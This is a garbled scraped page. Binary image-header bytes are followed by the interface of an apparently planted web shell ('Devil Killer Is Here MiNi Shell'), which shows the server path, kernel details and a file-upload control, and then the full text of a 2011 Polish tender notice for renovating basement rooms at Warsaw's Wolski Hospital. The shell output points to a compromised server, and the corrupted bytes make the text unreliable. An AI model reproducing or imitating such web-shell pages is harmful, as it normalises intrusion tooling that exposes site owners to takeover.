JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110408/110699-N-2011.html

<p class="kh_header"><b>Warszawa: Przebudowa części pomieszczeń piwnicznych (oraz murków oporowych zewnętrznych ) w Pawilonie nr 7 Szpitala Wolskiego -
Roboty budowlano-montażowe</b><br>
<b>Numer ogłoszenia: 110699 - 2011; data zamieszczenia: 08.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kasprzaka 17, 01-211 Warszawa, woj. mazowieckie, tel. 022 3894859, faks 022 3894922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolski.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa części pomieszczeń piwnicznych (oraz murków oporowych zewnętrznych ) w Pawilonie nr 7 Szpitala Wolskiego -
Roboty budowlano-montażowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia jest Przebudowa części pomieszczeń piwnicznych (oraz murków oporowych zewnętrznych) w Pawilonie nr 7 Szpitala Wolskiego - Roboty budowlano-montażowe.
3.2.	Lokalizacja  inwestycji:  Inwestycja będzie zlokalizowana na terenie będącym własnością Miasta Stołecznego Warszawa, władający- Szpital Wolski im dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej 01-211 Warszawa ul. Kasprzaka 17 - Pawilon Nr 7  -   Załącznik Nr 1 do SIWZ.
3.3.	Przedmiotem  przedsięwzięcia   są roboty budowlano-montażowe  przebudowy części pomieszczeń piwnicznych (ok.215 m2 p.u. - pomieszczenia po  Warsztacie Hydraulicznym i Elektrycznym) w  Pawilonie Nr 7 w celu ich dostosowania dla  potrzeb Archiwum Szpitalnego (wraz z towarzysząca infrastrukturą zewnętrzną).   
3.4.	Kody wg Słownika Zamówień Publicznych (CPV) - obejmujące między  innymi
następujące  roboty :
Roboty  rozbiórkowe                                                        CPV: 45111300-1                                    
Roboty w zakresie usuwania gruzu-                                 CPV: 45111220-6
Roboty w zakresie oczyszczenia terenu                           CPV: 45111213-4
Roboty w zakresie okładziny tynkowej                            CPV: 45324000-4 
Roboty w zakresie tynkowania                                         CPV: 45410000-4                                                                                
Instalowanie ścianek działowych                                      CPV: 45421152-4
Instalowanie sufitów podwieszonych                               CPV: 45421146-9
Roboty budowlane w zakresie podkładów.                      CPV: 45234130-6
Konstrukcje z betonu zbrojonego                                     CPV: 45223500-1
Zbrojenie ścian                                                                 CPV: 45262310-7
Betonowanie konstrukcji                                                  CPV: 45262311-4
Roboty ziemne                                                                  CPV: 45111200-0
Roboty w zakresie odwadniana gruntu                             CPV: 45111240-2
Roboty murarskie                                                              CPV: 45262522-6
Roboty malarskie                                                               CPV: 45442100-8
Instalowanie nawierzchni podłogowych                            CPV:45432120-1
Roboty w zakresie stolarki budowlanej                             CPV: 45421000-4
Montaż i wznoszenie gotowych konstrukcji ( regały )       CPV: 45223800-4
Roboty izolacyjne                                                               CPV: 45320000-6
Instalowanie sprzętu gaśniczego                                         CPV: 45343200-5
Instalowanie elektrycznych urządzeń rozdzielczych          CPV: 45317300-5
Roboty w zakresie instalacji elektrycznych                        CPV: 45311200-2
Sieci elektryczne                                                                 CPV: 32400000-7
Instalowanie przeciwwłamaniowych systemów alarmowych CPV:45312200-9
Roboty instalacyjne i kanalizacyjne                                    CPV: 45332000-3
Instalowanie urządzeń grzewczych wentylacyjnych i klimatyzacyjnych
Izolacja cieplna                                                                    CPV: 45321000-3

3.5. Przedmiot zamówienia opisany jest szczegółowo przez:
A)    DOKUMENTACJĘ PROJEKTOWĄ                                                                    
temat :  Przebudowa   pomieszczeń piwnicznych (na potrzeby Archiwum Szpitalnego)  w Pawilonie  Nr 7  Szpitala Wolskiego. 
1.  Projekt budowlano-wykonawczy  
branża architektoniczno-konstrukcyjna  
Architektura-  Projektant:         mgr inż. arch.  Piotr Dobrowolski
 Sprawdził:         mgr inż. arch. Paweł Dobrowolski
 Konstrukcja - Projektant:          mgr inż.           Wojciech Radłowski      
2.  Projekt budowlano-wykonawczy wentylacji i klimatyzacji
branża instalacyjna                      
Projektant:                                  mgr  inż.  Lesław Gębski
3.  Projekt budowlano - wykonawczy instalacji centralnego ogrzewania  
oraz instalacji wod.-kan.
branża instalacyjna  
Projektant:                                  mgr  inż.  Lesław Gębski
4.  Projekt budowlany systemu sterowania gaszeniem gazem
branża :      elektryczna  niskoprądowa 
Projektant :                                 mgr  inż. Witold Kotela 
branża:   instalacyjna    
Projektant:                                  mgr  inż.  Lesław Gębski 
5.  Projekt budowlany  instalacji elektrycznych wewnętrznych
branża elektryczna   
Projektant   	                     mgr inż. Witold Kotela
B)  Specyfikacje techniczne wykonania i odbioru robot  budowlanych
6. Branża :  architektoniczno-konstrukcyjna       
     Opracował :        inż. Jacek Łodyga                               -  Załącznik Nr 2 do SIWZ
7. Branża:  instalacyjna   (instalacja c.o., wod.- kan.)
     Projektant:     mgr   inż. Lesław  Gębski                        - Załącznik Nr 3 do SIWZ
8. Branża:  instalacyjna   ( klimatyzacja i wentylacja)
     Projektant:     mgr   inż. Lesław  Gębski                        - Załącznik Nr 4 do SIWZ
9. Branża:  elektryczna niskoprądowa, instalacyjna   
     Opracował::     mgr   inż. Dariusz Koszela                    - Załącznik Nr 5 do SIWZ
10  Branża :   elektryczna         
     Projektant:  Witold Kotela                                            -  Załącznik Nr 6 do SIWZ
C)  Przedmiary robót 

11.  branża:   architektoniczno-budowlana                            Załącznik Nr 7  do SIWZ  

12. branża:  instalacje sanitarne                                             Załącznik Nr 8  do SIWZ  
 
13. branża: instalacje elektryczne       	                         Załącznik Nr 9 do SIWZ 

14.  branża:  elektryczna, instalacyjna (system gaszenia gazem)   Załącznik Nr 10 do SIWZ 
	       
które stanowią podstawę do określenia ceny przedmiotu zamówienia.

Wyżej wymieniona dokumentacja dostępna jest pod adresem:  http://www.wolski.med.pl/Portals/0/dokumentacja_archiwum.zip
Kosztorysy ofertowe muszą być opracowane ( wersja uproszczona)  na podstawie w/w  Przedmiarów robót , bez możliwości dokonywania zmian.
Z dokumentacją projektową (wersja papierowa) można   się zapoznać się  w Sekcji Inwestycji i Remontów  Szpitala Wolskiego  tel.22-38 94 714


UWAGA:
1)	Prace będą prowadzone w czynnym pawilonie. 
2)	W czasie prowadzenia robot Wykonawca jest zobowiązany zapewnić bezkolizyjne  funkcjonowanie pozostałych części  budynku - pawilonu  Nr 7
3)	Cena umowna musi uwzględniać  także wszystkie koszty towarzyszące związane z realizacją przedmiotu zamówienia takie jak :
- koszty organizacji, eksploatacji i likwidacji  zaplecza budowy 
- koszty  sporządzenia wszystkich niezbędnych dokumentów m.in. :  protokóły z
pomiarów , z badań  np.  kominiarskich, inst.  hydrantowej),  pełną obsługę 
geodezyjną, wykonanie dokumentacji geodezyjnej powykonawczej  itp. ) koniecznych do odbioru robót zgodnie z  obowiązującym Prawem Budowlanym
4)	W cenie  umownej należy ująć  koszty wycinki ( plus  wywóz)   trzech cisów, rosnących przy murkach oporowych a  kolidujących z inwestycją.     
5) Prace będą realizowane na podstawie :
-  Decyzji - Pozwolenia na budowę
- Decyzji -zezwolenia na usuniecie krzewów
W/w dokumenty zostaną przekazane Wykonawcy robót  przy Protokóle wprowadzenia na budowę.
6)	Zleceniodawca decyduje o kolorystyce i  fakturze materiałów do wbudowania 
 (np. :stolarka, okładziny ścienne , podłogowe  ) oraz wyposażenia. 
7)	Wszystkie prace należy wykonać zgodnie z dokumentacja projektową, przepisami prawa budowlanego, polska normą, przepisami B.H.P. i p. pożarowymi
8)	Załączone w dokumentacji projektowej - oferty należy traktować  tylko jako 
       propozycję rozwiązania  technicznego. 
9)	Zleceniodawca zastrzega sobie możliwość rezygnacji z części robót  przewidzianych   do wykonania w dokumentacji. 
10)	Kierownik budowy jest zobowiązany do przedłożenia minimum 10  dni przed wprowadzeniem na budowę wszystkich niezbędnych dokumentów wynikających z  Prawa Budowlanego( oświadczenie, plan BIOZ)
11)Prosimy o zapoznanie się z przedmiotem SIWZ
12)Przedmiar w branży  architektoniczno-budowlanej 
Poz.10.3 Wykonanie regałów -  pozycja ta obejmuje: dostawę i montaż regałów przesuwnych. Opis szczegółowy znajduje się projekcie budowlano-architektonicznym  w poz.6.6  Roboty montażowe.  
Zamawiający nie dopuszcza składania ofert wariantowych.
Zamawiający nie dopuszcza składania ofert częściowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 Ustawy w przypadku wystąpienia okoliczności polegających na konieczności powtórzenia tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.20-6, 45.32.40.00-4, 45.41.00.00-4, 45.42.11.52-4, 45.42.11.46-9, 45.23.41.30-6, 55.22.35.00-1, 45.26.23.10-7, 45.26.23.11-4, 45.11.12.40-2, 45.26.25.22-6, 45.44.21.00-8, 45.43.21.20-1, 45.42.10.00-4, 45.22.38.00-4, 45.32.00.00-6, 45.34.32.00-5, 45.31.12.00-2, 32.40.00.00-7, 45.31.22.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy przystępujący do postępowania zobowiązani są wnieść wadium kwocie: 10.397,83 zł. (słownie: dziesięć tysięcy trzysta dziewięćdziesiąt siedem i 83/100 złotych). 
Wadium wnosi się przed upływem terminu składania ofert. 
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze w formie pieniężnej; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami ). 
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: 
	Nordea Bank Polska SA z siedziba 81-303 Gdynia ul. Kielecka 2, numer rachunku: 
	
	21 1440 1101 0000 0000 0606 2539
	wadium wniesione w pieniądzu musi wpłynąć na konto zamawiającego do upływu terminu składania ofert. 
	UWAGA!!! Kserokopię dowodu wpłaty należy dołączyć do oferty.
4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
5. W przypadku wniesienia wadium w innej formie niż pieniądz Zamawiający wymaga złożenia oryginału dokumentu potwierdzającego wniesienie wadium w siedzibie Zamawiającego, najpóźniej w terminie składania ofert. Kserokopię wniesienia wadium w formie niepieniężnej zaleca się dołączyć do oferty. 
6. Dokument wadium wniesionego w formie gwarancji bankowej/ubezpieczeniowej powinien zawierać klauzulę o gwarantowaniu wypłaty należności w sposób nieodwołalny, bezwarunkowy, na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. 
Zamawiający zwraca wadium niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 8 , 9 
8 . Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w  odpowiedzi na wezwanie o którym mowa w art. 26 ust.3, nie złoży dokumentów  lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
10. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:  który wycofał ofertę przed upływem terminu składania ofert; 
11. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu 
zwrócono wadium na podstawie pkt. 7 jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta uznana zostanie za najkorzystniejszą, w wyznaczonym przez Zamawiającego terminie. 
Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże się, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył) co najmniej 2 podobne zamówienia (za podobne zamówienia uznaje się roboty ogólnobudowlane i instalacyjne) o wartości nie mniejszej niż: 800.000,00 PLN (brutto) każde, z podaniem ich rodzaju i wartości, dat i miejsca wykonania oraz załączeniem dokumentów  potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
Zgodnie z art. 26 ust. 2 b prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, gdy Wykonawca, który dysponuje lub będzie dysponował osobami o następujących uprawnieniach, które będą uczestniczyć w wykonaniu zamówienia co najmniej:
1 osobą posiadającą uprawnienia budowlane w zakresie specjalności konstrukcyjno - budowlanej bez ograniczeń; wpisaną na listę członków właściwej izby samorządu zawodowego oraz do centralnego rejestru osób prowadzonego przez Głównego Inspektora Nadzoru Budowlanego;
Zgodnie z art. 26 ust. 2 b prawa zamówień publicznych wykonawca może polegać na oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże się, iż posiada opłaconą polisę a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca ubezpieczony jest od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">g)	Dowód wpłaty wadium.
h)	Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. Brak podpisu na ofercie lub podpisanie oferty przez osobę do tego nieupoważnioną spowoduje konieczność odrzucenia oferty. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Postępowanie o udzielenie zamówienia publicznego nie jest postępowaniem sądowym, stwierdzić należy, że złożenie dokumentu pełnomocnictwa lub prokury albo jego odpisu, wypisu lub kopii przez pełnomocnika wykonawcy w postępowaniu o udzielenie zamówienia publicznego nie podlega opłacie skarbowej</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony formularz oferty - załącznik nr 1 do SIWZ. 
b)	Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy  - Załącznik nr 7 do SIWZ.
c)	Załącznik nr 8 - oświadczenie.
